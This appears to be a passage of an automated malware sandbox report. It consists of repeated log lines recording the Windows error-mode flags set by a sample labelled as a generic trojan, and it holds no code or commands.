Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.31819.28757.exe	Process information set: FAILCRITICALERRORS \| NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.31819.28757.exe	Process information set: FAILCRITICALERRORS \| NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.31819.28757.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.31819.28757.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.31819.28757.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.31819.28757.exe	Process information set: FAILCRITICALERRORS \| NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.31819.28757.exe	Process information set: FAILCRITICALERRORS \| NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.31819.28757.exe	Process information set: FAILCRITICALERRORS \| NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.31819.28757.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.31819.28757.exe	Process information set: FAILCRITICALERRORS \| NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.31819.28757.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.31819.28757.exe	Process information set: FAILCRITICALERRORS \| NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.31819.28757.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.31819.28757.exe	Process information set: FAILCRITICALERRORS \| NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.31819.28757.exe	Process information set: FAILCRITICALERRORS \| NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.31819.28757.exe	Process information set: FAILCRITICALERRORS \| NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.31819.28757.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.31819.28757.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.31819.28757.exe	Process information set: FAILCRITICALERRORS \| NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.31819.28757.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.31819.28757.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.31819.28757.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.31819.28757.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.31819.28757.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.31819.28757.exe	Process information set: FAILCRITICALERRORS \| NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.31819.28757.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.31819.28757.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.31819.28757.exe	Process information set: FAILCRITICALERRORS \| NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.31819.28757.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.31819.28757.exe	Process information set: FAILCRITICALERRORS \| NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.31819.28757.exe	Process information set: FAILCRITICALERRORS \| NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.31819.28757.exe	Process information set: FAILCRITICALERRORS \| NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.31819.28757.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.31819.28757.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.31819.28757.exe	Process information set: FAILCRITICALERRORS \| NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.31819.28757.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.31819.28757.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.31819.28757.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.31819.28757.exe	Process information set: FAILCRITICALERRORS \| NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.31819.28757.exe	Process information set: FAILCRITICALERRORS \| NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.31819.28757.exe	Process information set: FAILCRITICALERRORS \| NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.31819.28757.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.31819.28757.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.31819.28757.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.31819.28757.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.31819.28757.exe	Process information set: FAILCRITICALERRORS \| NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.31819.28757.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.31819.28757.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.31819.28757.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.31819.28757.exe	Process information set: FAILCRITICALERRORS \| NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.31819.28757.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.31819.28757.exe	Process information set: FAILCRITICALERRORS \| NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.31819.28757.exe	Process information set: FAILCRITICALERRORS \| NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.31819.28757.exe	Process information set: FAILCRITICALERRORS \| NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.31819.28757.exe	Process information set: FAILCRITICALERRORS \| NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.31819.28757.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.31819.28757.exe	Process information set: FAILCRITICALERRORS \| NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.31819.28757.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.31819.28757.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.31819.28757.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.31819.28757.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.31819.28757.exe	Process information set: FAILCRITICALERRORS \| NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.31819.28757.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.31819.28757.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.31819.28757.exe	Process information set: FAILCRITICALERRORS \| NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.31819.28757.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.31819.28757.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.31819.28757.exe	Process information set: FAILCRITICALERRORS \| NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.31819.28757.exe	Process information set: FAILCRITICALERRORS \| NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.31819.28757.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.31819.28757.exe	Process information set: FAILCRITICALERRORS \| NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.31819.28757.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.31819.28757.exe	Process information set: FAILCRITICALERRORS \| NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.31819.28757.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.31819.28757.exe	Process information set: FAILCRITICALERRORS \| NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.31819.28757.exe	Process information set: FAILCRITICALERRORS \| NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.31819.28757.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.31819.28757.exe	Process information set: FAILCRITICALERRORS \| NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.31819.28757.exe	Process information set: FAILCRITICALERRORS \| NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.31819.28757.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.31819.28757.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.31819.28757.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.31819.28757.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.31819.28757.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.31819.28757.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.31819.28757.exe	Process information set: FAILCRITICALERRORS \| NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.31819.28757.exe	Process information set: FAILCRITICALERRORS \| NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.31819.28757.exe	Process information set: FAILCRITICALERRORS \| NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.31819.28757.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.31819.28757.exe	Process information set: FAILCRITICALERRORS \| NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.31819.28757.exe	Process information set: FAILCRITICALERRORS \| NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.31819.28757.exe	Process information set: FAILCRITICALERRORS \| NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.31819.28757.exe	Process information set: FAILCRITICALERRORS \| NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.31819.28757.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.31819.28757.exe	Process information set: FAILCRITICALERRORS \| NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.31819.28757.exe	Process information set: FAILCRITICALERRORS \| NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.31819.28757.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.31819.28757.exe	Process information set: FAILCRITICALERRORS \| NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.31819.28757.exe	Process information set: FAILCRITICALERRORS \| NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.31819.28757.exe	Process information set: FAILCRITICALERRORS \| NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.31819.28757.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.31819.28757.exe	Process information set: FAILCRITICALERRORS \| NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.31819.28757.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.31819.28757.exe	Process information set: FAILCRITICALERRORS \| NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.31819.28757.exe	Process information set: FAILCRITICALERRORS \| NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.31819.28757.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.31819.28757.exe	Process information set: FAILCRITICALERRORS \| NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.31819.28757.exe	Process information set: FAILCRITICALERRORS \| NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.31819.28757.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.31819.28757.exe	Process information set: FAILCRITICALERRORS \| NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.31819.28757.exe	Process information set: FAILCRITICALERRORS \| NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.31819.28757.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.31819.28757.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.31819.28757.exe	Process information set: FAILCRITICALERRORS \| NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.31819.28757.exe	Process information set: FAILCRITICALERRORS \| NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.31819.28757.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.31819.28757.exe	Process information set: FAILCRITICALERRORS \| NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.31819.28757.exe	Process information set: FAILCRITICALERRORS \| NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.31819.28757.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.31819.28757.exe	Process information set: FAILCRITICALERRORS \| NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.31819.28757.exe	Process information set: FAILCRITICALERRORS \| NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.31819.28757.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.31819.28757.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.31819.28757.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.31819.28757.exe	Process information set: FAILCRITICALERRORS \| NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.31819.28757.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.31819.28757.exe	Process information set: FAILCRITICALERRORS \| NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.31819.28757.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.31819.28757.exe	Process information set: FAILCRITICALERRORS \| NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.31819.28757.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.31819.28757.exe	Process information set: FAILCRITICALERRORS \| NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.31819.28757.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.31819.28757.exe	Process information set: FAILCRITICALERRORS \| NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.31819.28757.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.31819.28757.exe	Process information set: FAILCRITICALERRORS \| NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.31819.28757.exe	Process information set: FAILCRITICALERRORS \| NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.31819.28757.exe	Process information set: FAILCRITICALERRORS \| NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.31819.28757.exe	Process information set: FAILCRITICALERRORS \| NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.31819.28757.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.31819.28757.exe	Process information set: FAILCRITICALERRORS \| NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.31819.28757.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.31819.28757.exe	Process information set: FAILCRITICALERRORS \| NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.31819.28757.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.31819.28757.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX	Jump to behavior
